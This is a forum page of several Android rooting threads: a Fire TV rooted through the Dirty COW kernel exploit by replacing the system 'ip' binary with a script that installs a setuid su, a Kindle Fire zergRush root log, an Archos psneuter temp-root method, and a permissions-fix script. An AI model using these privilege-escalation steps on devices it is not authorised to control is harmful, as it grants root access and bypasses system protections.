Hi,
i just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external Links here)
Dirtycow allows you to write to files, even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here). Another problem was, that the modification only last for the current boot, so I could not just modify boot scripts. I had to find a binary, that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV gui, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script, that deploys the su binary.
This is what I did:
I compiled the dirtycow.c from timwr GitHub Repository CVE-2016-5195
Then I put the resulting binary into /data/local/tmp on my Firetv (via adb)
Now I pushed chainfires su binary to /data/local/tmp
I copied the /system/bin/ip binary to /data/local/tmp
I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755)
Code:
#!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su
/data/local/tmp/ip "[email protected]"
After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script) [This may take a while]
Now I went to my network settings of my Fire TV and changed them to a static ip address.
I reconnected to my amazon Fire tv and typed su
Code:
[email protected]:/ $ su
[email protected]:/ #
Lastly I installed the Supersu.apk from chainfire
Root seems to work with the adb shell and the terminal app. Somehow it does not with amaze file manager. If I start it I get thrown into the amazon fire ui.
This rooting method should also work for other versions of the fireOS, though I have not tested them.
Can you downgrade with being in the root state?
sconnyuk said:
Can you downgrade with being in the root state?
Click to expand...
Click to collapse
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
christofsteel said:
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
Click to expand...
Click to collapse
Will have to try this for fire stick.
Excellent find, ive been watching the dirtycow and this will come in handy if it works for fire stick.
sconnyuk said:
Will have to try this for fire stick.
Excellent find, ive been watching the dirtycow and this will come in handy if it works for fire stick.
Click to expand...
Click to collapse
Please report back
I think it is important to note, that I configured a static ip address to trigger the ip script. Root is permanent btw. as soon as the su binary is deployed, you can reboot all you like.
firetv have selinux? what version linux is it?
christianrodher said:
firetv have selinux? what version linux is it?
Click to expand...
Click to collapse
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
christofsteel said:
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
Click to expand...
Click to collapse
can you double check if sepolicy is present or something similar?
christianrodher said:
can you double check if sepolicy is present or something similar?
Click to expand...
Click to collapse
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
christofsteel said:
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
Click to expand...
Click to collapse
ok so when you do the exploit u where at selinux enforcing.... ok if is that simple after weve been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 im going to break the pc and the cell phone lol
@christianrodher No worries, I doubt this is the universal solution! I think it's that the TV runs `ip` with a really lenient SELinux context for some stupidly weird reason.
christianrodher said:
ok so when you do the exploit u where at selinux enforcing.... ok if is that simple after weve been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 im going to break the pc and the cell phone lol
Click to expand...
Click to collapse
No I did the exploit on my FireOS version 51.1.0.4. Afaik there was no SELinux present. SELinux is present in FireOS version 5.2.1.1. I can test, if this exlploit works on my now updated Fire TV.
Edit: It did not work I could not mount system read write. Seems like it only works for FireOS 3
Really tried to get this to work. I think I'm close. I saw SELinux complain about the file size so I did some padding. Here's where I'm at
187594885]
I/Kernel ( 163): [ 1503.059370] (0)[163:healthd]healthd: battery l=100 v=4200
t=2.2 h=2 st=5 chg=u
W/linker (10431): ./dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
W/linker (10431): ./dirtycow: unused DT entry: type 0x6fffffff arg 0x1
I/exploit (10431): size 223296
I/exploit (10431):
I/exploit (10431): [*] mmap 0xf7546000
I/exploit (10431): [*] exploit (patch)
I/exploit (10431): [*] currently 0xf7546000=464c457f
I/exploit (10431): [*] madvise = 0xf7546000 223296
I/Kernel ( 0): [ 1509.432532]-(2)[0:swapper/2]CPU2: Booted secondary process
or
I/Kernel ( 0): [ 1509.437302]-(3)[0:swapper/3]CPU3: Booted secondary process
or
I/Kernel ( 87): [ 1509.437743] (0)[87:hps_main][HPS] (0004)(1)(0)action end(2
7)(35)(0)(2) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (6)(230)(0) (0)(0)(0) (0)(6)(230)(0)
(6)
I/exploit (10431): [*] madvise = 0 1048576
I/Kernel ( 0): [ 1511.439231]-(1)[0:swapper/1]CPU1: Booted secondary process
or
I/Kernel ( 87): [ 1511.440339] (0)[87:hps_main]CPU3: shutdown
I/Kernel ( 87): [ 1511.440873] (0)[87:hps_main][HPS] (0800)(1)(2)action end(1
05)(102)(0)(1) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (105)(10)(0) (1666)(10)(0) (0)(102
)(10)(0)(102)
I/exploit (10431): [*] /proc/self/mem -1048576 1048576
I/exploit (10431): [*] exploited 0xf7546000=464c457f
I/art ( 501): Background partial concurrent mark sweep GC freed 256902(12MB
) AllocSpace objects, 15(2MB) LOS objects, 33% free, 20MB/31MB, paused 690us tot
al 136.802ms
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=50.64 rxSuccessRate=38.79 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
93, 94 ignore because P2P is connected
I/Kernel ( 87): [ 1513.438566] (0)[87:hps_main]CPU2: shutdown
I/Kernel ( 87): [ 1513.439651] (0)[87:hps_main][HPS] (0400)(2)(1)action end(7
)(4)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (7)(10)(0) (288)(10)(0) (0)(4)(10)(0)(
4)
I/Kernel ( 87): [ 1515.438476] (0)[87:hps_main]CPU1: shutdown
I/Kernel ( 87): [ 1515.439146] (0)[87:hps_main][HPS] (0200)(2)(0)action end(4
)(3)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (4)(10)(0) (46)(10)(0) (0)(3)(10)(0)(3
)
I/Kernel ( 119): [ 1521.197537] (0)[119:wdtk-0]wdk: [WDK], local_bit:0x1, cpu:
0, check_bit:0x1, RT[1521197519702]
I/Kernel ( 119): [ 1521.197575] (0)[119:wdtk-0]wdk: [WDK]: kick Ex WDT,RT[1521
197568471]
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=3.98 rxSuccessRate=3.61 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
94, 95 ignore because P2P is connected
^C
C:\Program Files (x86)\Minimal ADB and Fastboot>
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
I have an AFTV2 running latest firmware. I also noticed chainfires su binary i had was 32bit so I grabbed a 64bit one. Still no dice
[email protected]:/data/local/tmp $ ls -la
-rwxrwxrwx shell shell 13776 2016-10-31 17:43 dirtycow
-rwxrwxrwx shell shell 223296 2016-10-31 18:27 ip
-rwxrwxrwx shell shell 223296 2016-10-31 19:48 ip_script
-rwxrwxrwx shell shell 108480 2016-10-31 19:39 su
[email protected]:/data/local/tmp $
Hopes this helps someone
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse
you need to extract the SU binary file from Supersu. apk
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Do you save the shell script as ip_script.sh?
Sent from my SM-G920P using Tapatalk
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
VastVenomm said:
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Click to expand...
Click to collapse
You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
I still got 5.0.5.1 on my FTV1. Is there a chance that I might get root using the dirtycow exploit?
christofsteel said:
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
Click to expand...
Click to collapse
Rename apk to zip and extract su no diffence from what I posted.
Related
Received my KF about a week ago. Just tried to root it yesterday. That was successful. The instructions I was using said this: "This will “root” your Kindle Fire. You can actually stop here but I recommend you to go to the next steps to install TWRP Recovery, which will allow you to install/backup/restore ROMs and also “unroot” your Kindle Fire when needed easily." So, silly me, without doing further research, went on to the next steps. I almost immediately got stuck, here is the code, ending with the -bash where I was stuck.
Zach:~ Zbhest$
Zach:~ Zbhest$ cd Downloads/KindleFireRootMacLinux
Zach:KindleFireRootMacLinux Zbhest$ mkdir ~/.android
mkdir: /Users/Zbhest/.android: File exists
Zach:KindleFireRootMacLinux Zbhest$ cp adb_usb.ini ~/.android/.
Zach:KindleFireRootMacLinux Zbhest$ cp adb_usb.ini ~/.android/
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac kill-server
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac devices* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
08EC002600000001 device
Zach:KindleFireRootMacLinux Zbhest$ sh runmemac.sh
---------------------------------------------------------------
Easy rooting toolkit (v2.0)
created by DooMLoRD
Modified for Kindle Fire for Linux/Mac by Max Lee at RootKindleFire.com
using exploit zergRush (Revolutionary Team)
Credits go to all those involved in making this possible!
---------------------------------------------------------------
[*] This script will:
(1) root ur device using latest zergRush exploit (10 Nov)
(2) install Busybox (1.18.4)
(3) install SU files (binary: 3.0.3 and apk: 3.0.6)
[*] Before u begin:
(1) enable USB DEBUGGING
from (Menu\Settings\Applications\Development)
(2) enable UNKNOWN SOURCES
from (Menu\Settings\Applications)
(3) [OPTIONAL] increase screen timeout to 10 minutes
(4) connect USB cable to PHONE and then connect 2 computer
---------------------------------------------------------------
--- STARTING ----
--- WAITING FOR DEVICE
--- cleaning
rm failed for *, No such file or directory
--- pushing zergRush
1836 KB/s (23056 bytes in 0.012s)
--- correcting permissions
--- executing zergRush
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a GingerBread ! 0x00015118
[*] Scooting ...
[*] Sending 149 zerglings ...
[+] Zerglings found a way to enter ! 0x10
[+] Overseer found a path ! 0x000151e0
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x40119cd4 0x0054
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd195bb 0xafd39357
[*] Popping 24 more zerglings
[*] Sending 173 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root... enjoy!
--- WAITING FOR DEVICE TO RECONNECT
if it gets stuck over here for a long time then try:
disconnect usb cable and reconnect it
toggle USB DEBUGGING (first disable it then enable it)
--- DEVICE FOUND
--- pushing busybox
4634 KB/s (1075144 bytes in 0.226s)
--- correcting permissions
--- remounting /system
--- copying busybox to /system/xbin/
2099+1 records in
2099+1 records out
1075144 bytes transferred in 0.038 secs (28293263 bytes/sec)
--- correcting ownership
--- correcting permissions
--- installing busybox
--- pushing SU binary
1508 KB/s (22228 bytes in 0.014s)
--- correcting ownership
--- correcting permissions
--- correcting symlinks
--- pushing Superuser app
5116 KB/s (785801 bytes in 0.149s)
--- cleaning
--- rebooting
--- WAITING FOR DEVICE
5382 KB/s (3104805 bytes in 0.563s)
Error: Could not access the Package Manager. Is the system running?
All Done, Kindle Fire ROOTED!!!
Check out RootKindleFire.com for more cool hacks!
Zach:KindleFireRootMacLinux Zbhest$
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac root
restarting adbd as root
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac remountremount succeeded
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xbin/su
260 KB/s (22228 bytes in 0.083s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chmod -6755 /system/sbin/su
Bad mode
Zach:KindleFireRootMacLinux Zbhest$ .adb./adb-mac shell chown 0.0 /system/xbin/su
-bash: .adb./adb-mac: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chown 0.0 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ cd Desktop/kindleFireRootNew
-bash: cd: Desktop/kindleFireRootNew: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ cd desktop/kindlefirerootnew
-bash: cd: desktop/kindlefirerootnew: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xbin/su
877 KB/s (22228 bytes in 0.024s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac root
adbd is already running as root
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac remountremount succeeded
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xboin/su
264 KB/s (22228 bytes in 0.081s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell cown 0.0 /system/xbin/su
cown: not found
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chown 0.0 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chmod 06755 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac install Superuser.apk
3818 KB/s (785801 bytes in 0.200s)
pkg: /data/local/tmp/Superuser.apk
Success
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell
# su
# idme bootmode 4002
<idme> write 4002 to offset 0x1000
# reboot
Zach:KindleFireRootMacLinux Zbhest$ ./fastboot-mac -i 0x1949 boot twrp-blaze-2.0.0RC0.img
-bash: ./fastboot-mac: No such file or directory
And now my Mac does not recognize my KF. When I unplug my KF it appears bricked (will not turn on), but when it is plugged into a wall outlet I can do the hard reset, it charges, but does not go past the KF boot screen.
Also, ADB does not recognize any devices.
Additionally, I have a windows 7 machine. I was going to attempt to pick up where I left off, but as my KF is listed as an "unknown device," I cannot update drivers (or do not know how to do so manually). I also installed this little number: http://forum.xda-developers.com/showthread.php?t=1430038
And I currently have linux loaded on my W7 machine. When I try to use the "normal_boot" command, which is advised, I get:
"Resetting bootmode to standard boot...
< waiting for device >
"
So, yeah. That is where I am at. I WOULD go on to the other directions in firekit, but would prefer not to completely void the warranty using the "usb boot mode trick".
If windows 7 is the key here, I may need a walk through for driver installation and such. Otherwise, I am not totally disinclined to call customer service and ask for a replacement. Apparently they have been good about replacing rooted kindles?
Same issue right now... already tried reinstalling windows/firekit liveusb but nothing works=\ Is there any news on this problem?
http://support.microsoft.com/kb/315539/en-us
http://forum.xda-developers.com/showpost.php?p=20855280&postcount=54
I did read all those threads about such problem before. Just no matter what i do those drivers won't install. I only get unknown device on 7/xp and cannot change it coz when i manually select those drives windows says that there no device info in it=\ Thanks for help anyways
did you select adb_usb.ini ? it's just the folder with this file in it. selecting just the folder is usually enough. if you want to select the file: the driver file is android_winusb.inf. there is the harware info
if you have xp available then use this machine - it's easier
Yeah i did select that inf file (it was only one selectable in folder anyway) but it still says same stuff. I have xp right now if that gonna change something
yes xp is easier to handle because:
only 32bit -> only 1 driver version
no user access control -> don't need to do every thing as administrator
please check the following:
you have a .android folder under your user directory - in this folder is adb_usb.ini - the file has entries for device 0x1949 and 0x18D1 - if not run install.bat from the driver set i provided
check your device manager and delete every entry with kindle or adb
unplug and replug your kf - select the driver i provided manually
Got those 0x1949 and 0x18D1 in adb_usb file. And i only have unknown device every time i plug kindle in, no adb kindle at all
right click unknown device - update driver - select android_winusb.inf
if this don't work we have to cleanup old drivers -> could help per teamviewer if you like
When i try to update driver and manually use inf you provided it says that there no device info there=\ And i got unknown device since fresh windows install so idk what driver can cause it -.- I could ve try teamviewer but my windows is not english so it gonna be quite useless.
what language ?
Well it's in russian +there no laptop drivers yet coz im using xp only for this god dam kindle
ok your right - with russian i have a problem
will try to describe you the steps:
disconnect and power off (pwr ~30sec) your KF
open a command prompt
type "set devmgr_show_nonpresent_devices=1"
type "start devmgmt.msc"
Click Show hidden devices on the View menu in Device Manager
uninstall every entry with kindle, android phone or adb device
power down computer and power on again (no restart)
tell me if your done - we will resume ...
ok i did everything step by step tho there was none of adb/android phone/kindle so i just deleted my unknown device.
ok - lets resume:
you may want to delete your old driver set previously downloaded - it must be faulty
now download the one from this post and extract it to c:\
now plugin your kf (don't power it on - will do it by itself)
if you' asked
-choose browse my computer for driver software
-Then select have disk
-Then select browse
-direct to where you downloaded the usb driver i attached
-Select okay and okay
just in case you'r not asked:
-Go to device manager
-right click on the exclamation mark kindle
-Choose update driver software
-choose browse my computer for driver software
-choose let me pick from a list of devices on my computer
-Then select have disk
-Then select browse
-direct to where you downloaded the usb driver i attached
-Select okay and okay
if this don't work eighter then i would think you have a faulty cable !
try an other one ...
Nope still same=\ Guess i will look for new cable tomorrow then tho this one was just fine today at transfering stuff (dam you nokia!). Well thanks for trying to help anyway.
you have the nokia cable - i have the same one
tell me the status your kf now
stuck at boot screen ?
some other tricks:
http://forum.xda-developers.com/showpost.php?p=20945694&postcount=506
if you'r stuck in wrong bootmode:
with adb:
adb shell su -c "idme bootmode 4000"
adb reboot
with fastboot:
fastboot -i 0x1949 oem idme bootmode 4000
fastboot -i 0x1949 reboot
or
fastboot -i 0x18d1 oem idme bootmode 4000
fastboot -i 0x18d1 reboot
or
fastboot oem idme bootmode 4000
fastboot reboot
if you issue the fastboot commands and get <waiting for device> over some while power the kf off (pwr ~30sec) and on. at some point it should recognize the command
Yeah it same as before=\ I have same problem as topic starter aka device in fastboot and windows won't recognize it and install correct drivers. Fastboot commands won't work coz i don't have correct drivers and all they do is stuck on waiting for device/
xx time later = IT WORKS!!! for some weird reason it picked kindle up nothing changed in windows yet it works! Thanks again for your help time to flash recovery again.
courious - just tested on mine
when i switch to fastboot it is recognised as "android adb interface"
not the composite thing !
and i have the same drivers on xp
perhaps you want to try this one:
http://forum.xda-developers.com/showthread.php?t=1428428
sorry - no more ideas ...
UPDATE: hurraaa !!! - wish you all the best and good luck !!!
Hi All,
As some may know, current Official SDE for gen8 doesn't work on the new Froyo Gen8 v2 devices (currently: A70b / A70it2).
As we do on Gen9, there is a way to enable SDE menu in recovery for the new Archos A70S/A70it2. It's quite easy and safe, it has been used multiple times on gen9 and only use Archos commands (except of course temp root that is done by using psneuter).
Disclaimer: I'm not responsible if you blow your device with this, I'm only using existing Archos commands but this is not an official Archos release. Use at your own risks.
If you don't know about SDE, check my Gen9 thread here, it has some pictures that could help (70it2 menus are not exactly the same but are similar).
So, to enable it:
1) You must have adb working, I won't detail how to install or use it here. "adb shell" should give you a '$' prompt, if it doesn't, check your adb installation first.
2) Unzip content of the attached file to a directory (or platform-tools if adb is not in your PATH)
3) Launch enable_sde.bat script (or enable_sde.sh for linux, don't forget to chmod 755 it)
4) It should display something like this:
Code:
5800 KB/s (557962 bytes in 0.093s)
4625 KB/s (2564188 bytes in 0.541s)
5000 KB/s (728825 bytes in 0.142s)
property service neutered.
killing adbd. (should restart in a second or two)
Generating KD...
Updating KD (3293269 bytes)...
0
100
4) If it worked properly (check file sizes, some had troubles with adb push), reboot in recovery with power+vol+, you should now see the SDE boot menu. If you go to recovery, you should see the and if you go to recovery, you should see the "Developer Edition Menu". If it doesn't work for you, please report in this thread.
Next step is to install a rooted build, you can find one here.
Cheers,
LeTama
Flawless victory...excellent.
Hello!
i get the following error:
Code:
D:\test>enable_sde.bat
D:\test>adb push psneuter /tmp
failed to copy 'psneuter' to '/tmp/psneuter': Permission denied
D:\test>adb push init_zImage /tmp
failed to copy 'init_zImage' to '/tmp/init_zImage': Permission denied
D:\test>adb push init-cpio.gz /tmp
failed to copy 'init-cpio.gz' to '/tmp/init-cpio.gz': Permission denied
D:\test>adb shell chmod 755 /tmp/psneuter
chmod: /tmp/psneuter: No such file or directory
D:\test>adb shell /tmp/psneuter
/bin/sh: /tmp/psneuter: not found
D:\test>ping 127.0.0.1 -n 5 -w 1000 1>nul
D:\test>adb shell /usr/bin/kd_flasher -i /tmp/init-cpio.gz -k /tmp/init_zImage
Generating KD...
cannot open kernel file: No such file or directory
mkflashimage failed
D:\test>adb shell sync
D:\test>
it is an archos A70it2.
Honeycomb or Froyo model ?
This one is for Froyo, I changed title to reflect it, sorry. Check my sig for the Honeycomb one...
Ok, it is the honeycomb model I will try the other one - thx!
Hi
I want to bring you the fix permission script , t exactly same as the one in cwm/twrp ! The whole codes are written by cwm and cyanogen mod developers . I did some changes and modification to make it run on android enviroment .
How to use ?
You have two ways to use this script :
1- Using Script Manager :
Just change it names from fp.txt to fp.sh and run it in root mode
2- Using terminal emulator :
rename it to fp.sh . move it to /system/bin . change permissions to rwxrwxrwx ( 777 ) . open terminal and type :
Code:
su
fp.sh
Credits
cyanogen mod team
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Nexus 4 cihazımdan Tapatalk 4 Beta ile gönderildi
droidjam said:
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Nexus 4 cihazımdan Tapatalk 4 Beta ile gönderildi
Click to expand...
Click to collapse
But I don't think he need it all the time!
Maybe he want remove it after run it
Sent from my GT-I9300 using Tapatalk 4 Beta
droidjam said:
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Nexus 4 cihazımdan Tapatalk 4 Beta ile gönderildi
Click to expand...
Click to collapse
All busybox applets + system applets are moded in 777 !
I is just an small script and you have to remove it when you done your work . IT IS NOT A SYSTEM FILE OR A SYSFS FILE to be concerned about !!!!!!
Good! I needed some times something like this thanks for the scripts
regards!
Hello alireza7991 and thank you for this script!
I tried it on my Galaxy Tab 3 running RocketTab v3.1 ROM (excellent stuff, Android 4.1.2) using SSH Droid and Terminal (on my Mac) but I get a "Bus Error" for each application.
The fp.sh permissions are correct, and running it as "su" too, but I still get this below. Any idea what's wrong, please?
I think it starts by the fact it's not mounting properly. (please note this is run live, in Terminal via SSH) Check the "applet not found" error...
Code:
[email protected]:/data/data/berserker.android.apps.sshdroid/home # ./fp.sh
mount: applet not found
./fp.sh started at 02-08-2014 22:50:32
Processing (1 of 113): com.google.android.location...
Bus error
Processing (2 of 113): com.imdb.mobile...
Bus error
Processing (3 of 113): com.sec.android.app.phoneutil...
Bus error
[…]
Processing (112 of 113): com.google.android.syncadapters.contacts...
Bus error
Processing (113 of 113): com.google.android.backup...
Bus error
./fp.sh ended at 02-08-2014 22:50:57 (Runtime:0m25s)
[email protected]:/data/data/berserker.android.apps.sshdroid/home #
konsti said:
Hello alireza7991 and thank you for this script!
I tried it on my Galaxy Tab 3 running RocketTab v3.1 ROM (excellent stuff, Android 4.1.2) using SSH Droid and Terminal (on my Mac) but I get a "Bus Error" for each application.
The fp.sh permissions are correct, and running it as "su" too, but I still get this below. Any idea what's wrong, please?
I think it starts by the fact it's not mounting properly. (please note this is run live, in Terminal via SSH) Check the "applet not found" error...
Code:
[email protected]:/data/data/berserker.android.apps.sshdroid/home # ./fp.sh
mount: applet not found
./fp.sh started at 02-08-2014 22:50:32
Processing (1 of 113): com.google.android.location...
Bus error
Processing (2 of 113): com.imdb.mobile...
Bus error
Processing (3 of 113): com.sec.android.app.phoneutil...
Bus error
[…]
Processing (112 of 113): com.google.android.syncadapters.contacts...
Bus error
Processing (113 of 113): com.google.android.backup...
Bus error
./fp.sh ended at 02-08-2014 22:50:57 (Runtime:0m25s)
[email protected]:/data/data/berserker.android.apps.sshdroid/home #
Click to expand...
Click to collapse
install busybox and try :
Code:
export PATH=${PATH}:/system/xbin
before running it.
alireza7991 said:
install busybox and try :
Code:
export PATH=${PATH}:/system/xbin
before running it.
Click to expand...
Click to collapse
Thank you alireza7991, I am not an expert yet on Android (despite knowing some UNIX) so how can I first check if BusyBox is (properly) installed on this device? Is there a simple way to check, by means of e.g. a test command?
The ROM I am using is excellent RocketTab v3.1 for my Galaxy Tab 3 7" but unfortunately the thread is now locked (to ask). However, there is mention that BusyBox is installed... perhaps only the PATH environment was missing?
Many thanks again!
konsti said:
Thank you alireza7991, I am not an expert yet on Android (despite knowing some UNIX) so how can I first check if BusyBox is (properly) installed on this device? Is there a simple way to check, by means of e.g. a test command?
The ROM I am using is excellent RocketTab v3.1 for my Galaxy Tab 3 7" but unfortunately the thread is now locked (to ask). However, there is mention that BusyBox is installed... perhaps only the PATH environment was missing?
Many thanks again!
Click to expand...
Click to collapse
It's pretty similar to UNIX. type 'busybox' in terminal if busyox has not been installed shell will says the command not found or sth similar.
Hi again alireza7991, thanks for your info. Typing "busybox" on the terminal window on my Mac (via SSHDroid) I get:
Code:
BusyBox v1.21.0 (2013-07-08 16:00:47 CEST) multi-call binary.
Now, your export command although accepted, didn't work. So I figured typing it as I find it on my Mac:
Code:
export PATH="/system/xbin/":$PATH
[B]instead of[/B]
export PATH=${PATH}:/system/xbin
And now the script works, I tried it with -s option (for simulation) and get nothing as error(s) for apps. Does that mean I am OK in terns of "fixed" permissions?
However, as you can see, the last part of the script still has issues? Or is it the "simulation" flag?
Your comment is appreciated again… I think it's that last bit in your script (chmod 644 /system/app/*) which I am not sure what it serves for… or is it /system/ not properly mounted as r/w?
Many thanks:
Code:
[B][email protected]:/data/data/berserker.android.apps.sshdroid/home #[/B] [COLOR="DarkRed"]./fp.sh -s[/COLOR]
./fp.sh started at 02-15-2014 13:56:44
Processing (1 of 113): com.google.android.location...
Processing (2 of 113): com.imdb.mobile...
Processing (3 of 113): com.sec.android.app.phoneutil...
[...]
Processing (111 of 113): com.bigeyes0x0.trickstermod...
Processing (112 of 113): com.google.android.syncadapters.contacts...
Processing (113 of 113): com.google.android.backup...
./fp.sh ended at 02-15-2014 13:58:18 (Runtime:1m34s)
chmod: /system/app/AllshareService.apk: Read-only file system
chmod: /system/app/ApplicationsProvider.apk: Read-only file system
[...]
chmod: /system/app/minimode-res.apk: Read-only file system
chmod: /system/app/serviceModeApp.apk: Read-only file system
[B][email protected]:/data/data/berserker.android.apps.sshdroid/home #[/B]
alireza7991 said:
It's pretty similar to UNIX. type 'busybox' in terminal if busyox has not been installed shell will says the command not found or sth similar.
Click to expand...
Click to collapse
konsti said:
Hi again alireza7991, thanks for your info. Typing "busybox" on the terminal window on my Mac (via SSHDroid) I get:
Code:
BusyBox v1.21.0 (2013-07-08 16:00:47 CEST) multi-call binary.
Now, your export command although accepted, didn't work. So I figured typing it as I find it on my Mac:
Code:
export PATH="/system/xbin/":$PATH
[B]instead of[/B]
export PATH=${PATH}:/system/xbin
And now the script works, I tried it with -s option (for simulation) and get nothing as error(s) for apps. Does that mean I am OK in terns of "fixed" permissions?
However, as you can see, the last part of the script still has issues? Or is it the "simulation" flag?
Your comment is appreciated again… I think it's that last bit in your script (chmod 644 /system/app/*) which I am not sure what it serves for… or is it /system/ not properly mounted as r/w?
Many thanks:
Code:
[B][email protected]:/data/data/berserker.android.apps.sshdroid/home #[/B] [COLOR="DarkRed"]./fp.sh -s[/COLOR]
./fp.sh started at 02-15-2014 13:56:44
Processing (1 of 113): com.google.android.location...
Processing (2 of 113): com.imdb.mobile...
Processing (3 of 113): com.sec.android.app.phoneutil...
[...]
Processing (111 of 113): com.bigeyes0x0.trickstermod...
Processing (112 of 113): com.google.android.syncadapters.contacts...
Processing (113 of 113): com.google.android.backup...
./fp.sh ended at 02-15-2014 13:58:18 (Runtime:1m34s)
chmod: /system/app/AllshareService.apk: Read-only file system
chmod: /system/app/ApplicationsProvider.apk: Read-only file system
[...]
chmod: /system/app/minimode-res.apk: Read-only file system
chmod: /system/app/serviceModeApp.apk: Read-only file system
[B][email protected]:/data/data/berserker.android.apps.sshdroid/home #[/B]
Click to expand...
Click to collapse
I think I 've forgot to mount system rw before. this was used to fix a bug which caused bootloop in my device.
however this is an extremely old job and I do not remember what I have done, sorry .
alireza7991 said:
I think I 've forgot to mount system rw before. this was used to fix a bug which caused bootloop in my device.
however this is an extremely old job and I do not remember what I have done, sorry .
Click to expand...
